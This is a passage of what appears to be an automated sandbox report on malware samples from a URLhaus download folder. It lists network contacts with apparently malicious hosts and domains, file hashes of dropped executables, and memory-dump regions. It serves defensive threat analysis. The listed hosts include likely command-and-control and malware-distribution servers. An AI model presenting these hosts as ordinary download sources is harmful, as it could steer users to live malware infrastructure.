| GB | 79.133.176.178:80 | 1717.1000uc.com | tcp |
| HK | 47.79.66.211:443 | a19ccc1.oss-cn-hongkong.aliyuncs.com | tcp |
| BG | 87.121.86.16:80 | utorrent-backup-server.top | tcp |
| IR | 217.172.98.87:443 | karoonpc.com | tcp |
| IR | 185.79.156.69:80 | osecweb.ir | tcp |
| MX | 148.231.192.3:80 | desquer.ens.uabc.mx | tcp |
| CN | 140.210.18.161:88 | www.333zz.top | tcp |
| CN | 116.131.226.94:80 | src1.minibai.com | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| MY | 210.19.94.140:443 | www.maxmoney.com | tcp |
| US | 104.192.108.20:80 | softdl.360tpcdn.com | tcp |
| US | 74.64.155.4:9090 | 74.64.155.4 | tcp |
| US | 170.55.7.234:80 | 170.55.7.234 | tcp |
| CN | 139.198.15.223:8080 | tcp | |
| HK | 103.59.103.198:80 | 103.59.103.198 | tcp |
| CN | 123.235.29.162:6713 | tcp | |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.176.133.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.156.79.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.98.172.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.43.150.166.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.192.231.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.66.79.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.66.79.47.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | xss-1253555722.cos.ap-singapore.myqcloud.com | udp |
| CN | 1.189.232.62:80 | d.kpzip.com | tcp |
| RU | 176.111.174.140:443 | tcp | |
| US | 8.8.8.8:53 | dow.andylab.cn | udp |
| US | 8.8.8.8:53 | 4.155.64.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.7.55.170.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.108.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.103.59.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.94.19.210.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| NL | 82.168.179.78:1978 | mohibkal.publicvm.com | tcp |
| CN | 60.191.236.246:820 | safe.ywxww.net | tcp |
| HK | 134.122.129.18:80 | 134.122.129.18 | tcp |
| GB | 163.181.154.237:80 | cdn.ly.9377.com | tcp |
| US | 8.8.8.8:53 | www.grupodulcemar.pe | udp |
| US | 8.8.8.8:53 | 140.174.111.176.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| BR | 187.115.56.93:80 | 187.115.56.93 | tcp |
| EC | 186.3.78.195:80 | 186.3.78.195 | tcp |
| US | 8.8.8.8:53 | www.teknoarge.com | udp |
| RU | 77.72.254.210:17017 | 77.72.254.210 | tcp |
| US | 8.8.8.8:53 | artemka.spb.ru | udp |
| IN | 180.150.240.238:80 | 180.150.240.238 | tcp |
| US | 8.8.8.8:53 | storage.soowim.co.kr | udp |
| US | 8.8.8.8:53 | alien-training.com | udp |
| US | 8.8.8.8:53 | 237.154.181.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.129.122.134.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | 210.254.72.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.240.150.180.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.78.3.186.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.56.115.187.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| CN | 61.163.161.171:80 | download.caihong.com | tcp |
| CN | 120.52.95.247:80 | 360down7.miiyun.cn | tcp |
| CN | 122.228.207.55:80 | qiniuyunxz.yxflzs.com | tcp |
| SG | 43.152.64.193:80 | xss-1253555722.cos.ap-singapore.myqcloud.com | tcp |
| CN | 116.142.249.98:80 | dow.andylab.cn | tcp |
| US | 8.8.8.8:53 | 139520.aioc.qbgxl.com | udp |
| US | 8.8.8.8:53 | www.pornhub.com | udp |
| US | 66.254.114.41:443 | www.pornhub.com | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | static.trafficjunky.com | udp |
| US | 8.8.8.8:53 | ei.phncdn.com | udp |
| US | 206.217.142.166:1234 | tcp | |
| GB | 64.210.156.18:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.18:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| US | 8.8.8.8:53 | 193.64.152.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | media.trafficjunky.net | udp |
| US | 8.8.8.8:53 | cdn1-smallimg.phncdn.com | udp |
| US | 66.254.114.156:443 | cdn1-smallimg.phncdn.com | tcp |
| GB | 64.210.156.16:443 | media.trafficjunky.net | tcp |
| US | 8.8.8.8:53 | frojbdawmiojfg.sytes.net | udp |
| LV | 198.181.163.35:4410 | frojbdawmiojfg.sytes.net | tcp |
| GB | 64.210.156.16:443 | media.trafficjunky.net | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | ss.phncdn.com | udp |
| US | 8.8.8.8:53 | a.adtng.com | udp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| US | 8.8.8.8:53 | 156.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | pix-cdn77.trafficjunky.net | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| GB | 89.187.167.20:443 | pix-cdn77.trafficjunky.net | tcp |
| US | 8.8.8.8:53 | ht-cdn2.adtng.com | udp |
| PE | 161.132.57.101:80 | www.grupodulcemar.pe | tcp |
| GB | 64.210.156.23:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.23:443 | ht-cdn2.adtng.com | tcp |
| TR | 31.145.124.122:80 | www.teknoarge.com | tcp |
| IE | 52.92.2.148:80 | alien-training.com | tcp |
| RU | 178.130.39.138:80 | artemka.spb.ru | tcp |
| KR | 210.216.165.152:80 | storage.soowim.co.kr | tcp |
| US | 8.8.8.8:53 | hw-cdn2.adtng.com | udp |
| GB | 64.210.156.6:443 | hw-cdn2.adtng.com | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | storage.googleapis.com | udp |
| US | 8.8.8.8:53 | 171.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.167.187.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.2.92.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.39.130.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.57.132.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.165.216.210.in-addr.arpa | udp |
| GB | 172.217.169.91:443 | storage.googleapis.com | tcp |
| US | 8.8.8.8:53 | 91.169.217.172.in-addr.arpa | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| AR | 200.105.67.246:80 | www.flechabusretiro.com.ar | tcp |
| JP | 8.209.212.26:8000 | 8.209.212.26 | tcp |
| RU | 176.113.115.178:80 | 176.113.115.178 | tcp |
| US | 8.8.8.8:53 | 5-157-110-232.dyn.eolo.it | udp |
| US | 8.8.8.8:53 | 172-105-66-118.ip.linodeusercontent.com | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | 178.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.67.105.200.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.212.209.8.in-addr.arpa | udp |
| CN | 61.160.195.64:80 | 139520.aioc.qbgxl.com | tcp |
| US | 8.8.8.8:53 | download.innovare.no | udp |
| IR | 185.79.156.69:443 | osecweb.ir | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| IR | 185.79.156.69:443 | osecweb.ir | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 88.221.134.89:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.seetrol.com | udp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.134.221.88.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| CN | 60.191.236.246:820 | safe.ywxww.net | tcp |
| CN | 47.104.173.216:9876 | tcp | |
| KR | 139.150.75.206:80 | www.seetrol.com | tcp |
| US | 8.8.8.8:53 | venom.underground-cheat.com | udp |
| US | 8.8.8.8:53 | 206.75.150.139.in-addr.arpa | udp |
| PL | 217.12.206.79:80 | tcp | |
| NL | 85.31.47.143:39001 | venom.underground-cheat.com | tcp |
| US | 8.8.8.8:53 | www.opolis.io | udp |
| US | 8.8.8.8:53 | hnjgdl.geps.glodon.com | udp |
| US | 8.8.8.8:53 | deauduafzgezzfgm.top | udp |
| US | 8.8.8.8:53 | 143.47.31.85.in-addr.arpa | udp |
| HK | 45.15.9.44:80 | tcp | |
| SG | 168.138.162.78:80 | tcp | |
| US | 8.8.8.8:53 | protechasia.com | udp |
| US | 8.8.8.8:53 | cheat.underground-cheat.com | udp |
| NL | 85.31.47.135:80 | cheat.underground-cheat.com | tcp |
| US | 8.8.8.8:53 | 78.162.138.168.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.9.15.45.in-addr.arpa | udp |
| SE | 185.130.45.176:80 | tcp | |
| DE | 172.105.66.118:80 | 172-105-66-118.ip.linodeusercontent.com | tcp |
| IT | 5.157.110.232:80 | 5-157-110-232.dyn.eolo.it | tcp |
| CN | 123.117.136.97:9000 | tcp | |
| KR | 119.193.158.215:80 | tcp | |
| US | 8.8.8.8:53 | 118.66.105.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.45.130.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.110.157.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.158.193.119.in-addr.arpa | udp |
| VN | 14.243.221.170:2654 | tcp | |
| NL | 85.31.47.143:3333 | venom.underground-cheat.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
| SHA1 | 66c18b0406201c3cfbba6e239ab9ee3dbb3be07d |
| SHA256 | 5843872d5e2b08f138a71fe9ba94813afee59c8b48166d4a8eb0f606107a7e80 |
| SHA512 | 4f2fc415026d7fd71c5018bc2ffdf37a5b835a417b9e5017261849e36d65375715bae148ce8f9649f9d807a63ac09d0fb270e4abae83dfa371d129953a5422ca |
C:\Users\Admin\AppData\Local\Temp\_MEI39482\_multiprocessing.pyd
| MD5 | 1386dbc6dcc5e0be6fef05722ae572ec |
| SHA1 | 470f2715fafd5cafa79e8f3b0a5434a6da78a1ba |
| SHA256 | 0ae3bf383ff998886f97576c55d6bf0a076c24395cf6fcd2265316e9a6e8c007 |
| SHA512 | ca6e5c33273f460c951cb8ec1d74ce61c0025e2ead6d517c18a6b0365341a0fd334e8976006cd62b72eb5620ccc42cfdd5196e8b10691b8f19f69f851a440293 |
C:\Users\Admin\AppData\Local\Temp\_MEI39482\_decimal.pyd
| MD5 | d47e6acf09ead5774d5b471ab3ab96ff |
| SHA1 | 64ce9b5d5f07395935df95d4a0f06760319224a2 |
| SHA256 | d0df57988a74acd50b2d261e8b5f2c25da7b940ec2aafbee444c277552421e6e |
| SHA512 | 52e132ce94f21fa253fed4cf1f67e8d4423d8c30224f961296ee9f64e2c9f4f7064d4c8405cd3bb67d3cf880fe4c21ab202fa8cf677e3b4dad1be6929dbda4e2 |
C:\Users\Admin\AppData\Local\Temp\_MEI39482\_cffi_backend.cp311-win_amd64.pyd
| MD5 | 739d352bd982ed3957d376a9237c9248 |
| SHA1 | 961cf42f0c1bb9d29d2f1985f68250de9d83894d |
| SHA256 | 9aee90cf7980c8ff694bb3ffe06c71f87eb6a613033f73e3174a732648d39980 |
| SHA512 | 585a5143519ed9b38bb53f912cea60c87f7ce8ba159a1011cf666f390c2e3cc149e0ac601b008e039a0a78eaf876d7a3f64fff612f5de04c822c6e214bc2efde |
C:\Users\Admin\AppData\Local\Temp\_MEI39482\_ctypes.pyd
| MD5 | 6a9ca97c039d9bbb7abf40b53c851198 |
| SHA1 | 01bcbd134a76ccd4f3badb5f4056abedcff60734 |
| SHA256 | e662d2b35bb48c5f3432bde79c0d20313238af800968ba0faa6ea7e7e5ef4535 |
| SHA512 | dedf7f98afc0a94a248f12e4c4ca01b412da45b926da3f9c4cbc1d2cbb98c8899f43f5884b1bf1f0b941edaeef65612ea17438e67745962ff13761300910960d |
C:\Users\Admin\AppData\Local\Temp\_MEI39482\python3.dll
| MD5 | 34e49bb1dfddf6037f0001d9aefe7d61 |
| SHA1 | a25a39dca11cdc195c9ecd49e95657a3e4fe3215 |
| SHA256 | 4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281 |
| SHA512 | edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856 |
C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
| MD5 | 2697c90051b724a80526c5b8b47e5df4 |
| SHA1 | 749d44fe2640504f15e9bf7b697f1017c8c2637d |
| SHA256 | f8b23a264f58e9001e087af2bf48eed5938db31b5b1b20d973575cfa6a121355 |
| SHA512 | d0c8d76699f2f88d76eeaf211e59a780969b7692b513495a34013af8380d3fe0616caf03c6e47b8e7721d2f0a369c1dd20860b755b7d607783a99080c5f5315b |
memory/932-125-0x0000000075382000-0x0000000075383000-memory.dmp
memory/932-126-0x0000000075380000-0x0000000075931000-memory.dmp
memory/932-127-0x0000000075380000-0x0000000075931000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
| MD5 | 3050c0cddc68a35f296ba436c4726db4 |
| SHA1 | 199706ee121c23702f2e7e41827be3e58d1605ea |
| SHA256 | 6bcddc15bc817e1eff29027edc4b19ef38c78b53d01fb8ffc024ad4df57b55c2 |
| SHA512 | b95c673a0c267e3ba56ffa26c976c7c0c0a1cc61f3c25f7fc5041919957ad5cb3dfe12d2a7cc0a10b2db41f7e0b42677b8e926d7b4d8679aadbd16976bd8e3ca |
memory/1864-143-0x000000007314E000-0x000000007314F000-memory.dmp
memory/1864-144-0x00000000002F0000-0x0000000000346000-memory.dmp
memory/1864-145-0x00000000026E0000-0x00000000026E6000-memory.dmp
memory/1864-146-0x000000000A150000-0x000000000A1B2000-memory.dmp
memory/1864-147-0x000000000A250000-0x000000000A2EC000-memory.dmp
memory/1864-148-0x000000000A8A0000-0x000000000AE44000-memory.dmp
memory/1864-149-0x000000000A390000-0x000000000A422000-memory.dmp
memory/1864-150-0x000000000A1F0000-0x000000000A1F6000-memory.dmp
memory/3808-151-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/3808-155-0x0000000000400000-0x00000000004A2000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
| MD5 | 2d79aec368236c7741a6904e9adff58f |
| SHA1 | c0b6133df7148de54f876473ba1c64cb630108c1 |
| SHA256 | b33f25c28bf15a787d41472717270301071af4f10ec93fa064c96e1a33455c35 |
| SHA512 | 022c5d135f66bc253a25086a2e9070a1ae395bdedd657a7a5554563dace75e1cbfe77c87033d6908d72deeab4a53f50e8bd202c4f6d6a9f17a19a9ebfdfe9538 |
memory/932-183-0x0000000075380000-0x0000000075931000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe
| MD5 | bf7866489443a237806a4d3d5701cdf3 |
| SHA1 | ffbe2847590e876892b41585784b40144c224160 |
| SHA256 | 1070bf3c0f917624660bef57d24e6b2cf982dce067e95eb8a041586c0f41a095 |
| SHA512 | e9bb9d5157d2011eed5f5013af4145877e3237def266f2cc6fd769ed7065a4fa227f7d316de5fc7eeae8f3f852b685fb3cc166127f79134f1fa1a200b8c0c186 |
memory/4728-194-0x0000000000560000-0x00000000005D4000-memory.dmp
memory/4728-195-0x0000000004E50000-0x0000000004E5A000-memory.dmp
memory/2964-215-0x0000000000400000-0x000000000066D000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
| MD5 | de45ebaf10bc27d47eb80a485d7b59f2 |
| SHA1 | ba534af149081e0d1b8f153287cd461dd3671ffd |
| SHA256 | a746597e9b0877a8a6d4d919279045bfea2801d74348b034f222466c2200ea21 |
| SHA512 | 9228255ae7df9c3a332cce8451cf9298298f4f3aab8a25fe334258d76f11cd2bdb069452381cfa68ec46b16a7371dd1e9ad6dfd69c293f068422eae953f2f22a |
C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe
| MD5 | d259a1c0c84bbeefb84d11146bd0ebe5 |
| SHA1 | feaceced744a743145af4709c0fccf08ed0130a0 |
| SHA256 | 8de12184a006d3340241492baca0ba1034182b08d3c6a0f09c0af99d539bd48b |
| SHA512 | 84944d132fb47be7d22e55456bc1c4bbb93ce281b775e57641a012602f77219c6a9c75ed67ca1fbec1ee15550dee58b9a8adeacbe136e58d2ed1f4c6b755fd54 |
memory/3280-236-0x0000000000400000-0x000000000041F000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe
| MD5 | 935cd858e1bfa763e24214f64e400a15 |
| SHA1 | f8d129e7288a9c41a0bd44521b253a6f708d9684 |
| SHA256 | c3c6e841f611923135474590c9c7c770a49f0c87c4e1850e13bb2b48ffdb5104 |
| SHA512 | 4b8bd0aa1635f3f4e1d6b32119ef34bb4693ea083b08aae21b3c98c84057b9475f2d858f881641ec48618182822ca071d09110696dec229e82d586814f89b122 |
memory/1224-246-0x0000000000400000-0x0000000000425000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe
| MD5 | 11bc606269a161555431bacf37f7c1e4 |
| SHA1 | 63c52b0ac68ab7464e2cd777442a5807db9b5383 |
| SHA256 | 1831806fc27d496f0f9dcfd8402724189deaeb5f8bcf0118f3d6484d0bdee9ed |
| SHA512 | 0be867fce920d493d2a37f996627bceea87621ba4071ae4383dd4a24748eedf7dc5ca6db089217b82ec38870248c6840f785683bf359d1014c7109e7d46dd90f |
memory/4728-264-0x0000000005060000-0x0000000005072000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe
| MD5 | 73c088a54fd675be63ae50e1415bce9b |
| SHA1 | 968ca108ce1d803f69cc3e1833d6d56615342169 |
| SHA256 | e9cb28657a6dcd7e0f17f6e4f7d128351c389784bb027fdaba7f669794edc846 |
| SHA512 | 109d80075631fae4a952b972073677aafdb8b6c70d7e6ac1add6d6bfb5bee9a5227c3691d229a70ac67b993f37464b89efaf87b62f6646b135311e04419f9c09 |
memory/112-283-0x0000000000AF0000-0x0000000000B66000-memory.dmp
memory/3280-287-0x0000000000400000-0x000000000041F000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/112-303-0x0000000003220000-0x0000000003262000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr
| MD5 | aba2d86ed17f587eb6d57e6c75f64f05 |
| SHA1 | aeccba64f4dd19033ac2226b4445faac05c88b76 |
| SHA256 | 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d |
| SHA512 | c3f276820d6b2872c98fa36c7b62f236f9f2650b344a243a30dcda9ca08726f6ce27c5c380b4256a1a7d8d4309e1f2f270f10bad18099a8c9e1835925ea51806 |
C:\Users\Admin\AppData\Local\Temp\scoped_dir2608_1360859761\7d97f0d3-6926-4d65-8f84-c0a339cd63e7.tmp
| MD5 | 3f6f93c3dccd4a91c4eb25c7f6feb1c1 |
| SHA1 | 9b73f46adfa1f4464929b408407e73d4535c6827 |
| SHA256 | 19f05352cb4c6e231c1c000b6c8b7e9edcc1e8082caf46fff16b239d32aa7c9e |
| SHA512 | d488fa67e3a29d0147e9eaf2eabc74d9a255f8470cf79a4aea60e3b3b5e48a3fcbc4fc3e9ce58dff8d7d0caa8ae749295f221e1fe1ba5d20deb2d97544a12ba4 |
C:\Users\Admin\AppData\Local\Temp\scoped_dir2608_1360859761\CRX_INSTALL\_locales\en_CA\messages.json
| MD5 | 558659936250e03cc14b60ebf648aa09 |
| SHA1 | 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825 |
| SHA256 | 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b |
| SHA512 | 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\dasherSettingSchema.json
| MD5 | 4ec1df2da46182103d2ffc3b92d20ca5 |
| SHA1 | fb9d1ba3710cf31a87165317c6edc110e98994ce |
| SHA256 | 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6 |
| SHA512 | 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\_locales\en_CA\messages.json
| MD5 | 07ffbe5f24ca348723ff8c6c488abfb8 |
| SHA1 | 6dc2851e39b2ee38f88cf5c35a90171dbea5b690 |
| SHA256 | 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c |
| SHA512 | 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | cfa0650e39b1538915cf2768ee79985d |
| SHA1 | a2e062898a45473e76b3d5f2f2ea5f80098db2d9 |
| SHA256 | d180afcf17c73377523056102f5e8e114cfb99eb084250bf4b4c77993d90ddac |
| SHA512 | d83339817821cd0ce8e065c9e87777ba895cc88c5a7f7c452846381e59f82b02a9d040f515a2ae94969e73a1088c4b9ef09aa83e7fbc029420561f67cd020631 |
C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr
| MD5 | 513b447629c40c3a014d2c876db4d46d |
| SHA1 | 5f4e6977710602bea5d0023fa4f39e3648d2f015 |
| SHA256 | 7e4178577a90b4e1476167bcd46207e4f682bb08412e4688563bbae60476a167 |
| SHA512 | d659f01ab481f670b9a1c785d88544186c898ac7b8558b49d22444a9182c702d6462b2514d1e8dec0c02cd0744724780f8eb3908f0e031ccb302955bb43c9a7f |
memory/1224-733-0x0000000000400000-0x0000000000425000-memory.dmp
memory/1224-732-0x0000000000400000-0x0000000000425000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\unik.exe
| MD5 | 8d4744784b89bf2c1affb083790fdc88 |
| SHA1 | d3f5d8d2622b0d93f7ce5b0da2b5f4ed439c6ec5 |
| SHA256 | d6a689c92843fce8cbd5391511ed74f7e9b6eb9df799626174a8b4c7160bea75 |
| SHA512 | b3126463c8d5bb69a161778e871928dc9047b69bfcb56b1af91342034a15e03a1e5a0ccea4ba7334a66a361842e8241046e00500626613a00cb5bec891436641 |
memory/3636-752-0x0000000000400000-0x00000000008BA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 36988ca14952e1848e81a959880ea217 |
| SHA1 | a0482ef725657760502c2d1a5abe0bb37aebaadb |
| SHA256 | d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6 |
| SHA512 | d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\3d931e76-2d97-46dc-b793-0e3df19e175f.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | fab8d8d865e33fe195732aa7dcb91c30 |
| SHA1 | 2637e832f38acc70af3e511f5eba80fbd7461f2c |
| SHA256 | 1b034ffe38e534e2b7a21be7c1f207ff84a1d5f3893207d0b4bb1a509b4185ea |
| SHA512 | 39a3d43ef7e28fea2cb247a5d09576a4904a43680db8c32139f22a03d80f6ede98708a2452f3f82232b868501340f79c0b3f810f597bcaf5267c3ccfb1704b43 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e21f9d7927b3e3339999038450e5ba6c |
| SHA1 | b99e9d7c2fd55e47b5a99915924c05c350b8eed2 |
| SHA256 | 31dac7297a481790647724631e363abaf464c38f5758613616fcacaf0b7ab3d8 |
| SHA512 | 45162dbead1e25b748af80913861e9017c576d13952da0527e40376ffaa6c07cbb46b3a64a5fc4877d0eb833c92dfe20cdd0acda3bef2adc483ce78629fffc9c |
memory/3636-788-0x0000000010000000-0x000000001001C000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe
| MD5 | 2dcfbac83be168372e01d4bd4ec6010c |
| SHA1 | 5f0cf3f5be05b478dec3a55b7e1757ca7c1a7fd3 |
| SHA256 | 68fbb7d4c5af27b3941f4db758e2007decdd35849ab025a9e06d2ad4718b8b63 |
| SHA512 | a5acad6b7f97472367f59e85e8d61e7bbf25d6a1fc9054910780593440a2345d9ec8bb22a7f41b5b8f85eacbab9f8971dbe31c11c4c887647f86140f98e5a143 |
memory/4048-797-0x0000000000400000-0x000000000047D000-memory.dmp
memory/4728-801-0x0000000006440000-0x0000000006494000-memory.dmp
C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe
| MD5 | 169a647d79cf1b25db151feb8d470fc7 |
| SHA1 | 86ee9ba772982c039b070862d6583bcfed764b2c |
| SHA256 | e61431610df015f48ebc4f4bc0492c4012b34d63b2f474badf6085c9dbc7f708 |
| SHA512 | efb5fd3e37da05611be570fb87929af73e7f16639b5eb23140381434dc974afc6a69f338c75ede069b387015e302c5106bf3a8f2727bb0406e7ca1de3d48a925 |
memory/4312-812-0x000001E7EDE60000-0x000001E7EE07C000-memory.dmp
memory/4312-815-0x000001E7F07B0000-0x000001E7F094E000-memory.dmp
memory/4312-817-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-823-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-835-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-861-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-857-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-867-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-865-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-863-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-855-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-853-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-851-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-859-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
memory/4312-849-0x000001E7F07B0000-0x000001E7F0948000-memory.dmp
